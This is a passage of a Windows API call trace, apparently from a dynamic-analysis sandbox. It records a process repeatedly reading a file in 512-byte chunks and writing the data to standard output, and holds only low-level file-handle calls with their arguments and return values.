0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.980] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.980] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.981] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.981] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.982] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.982] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.983] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.985] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.986] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.987] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] GetFileType (hFile=0x50) returned 0x1 [0194.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.987] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, 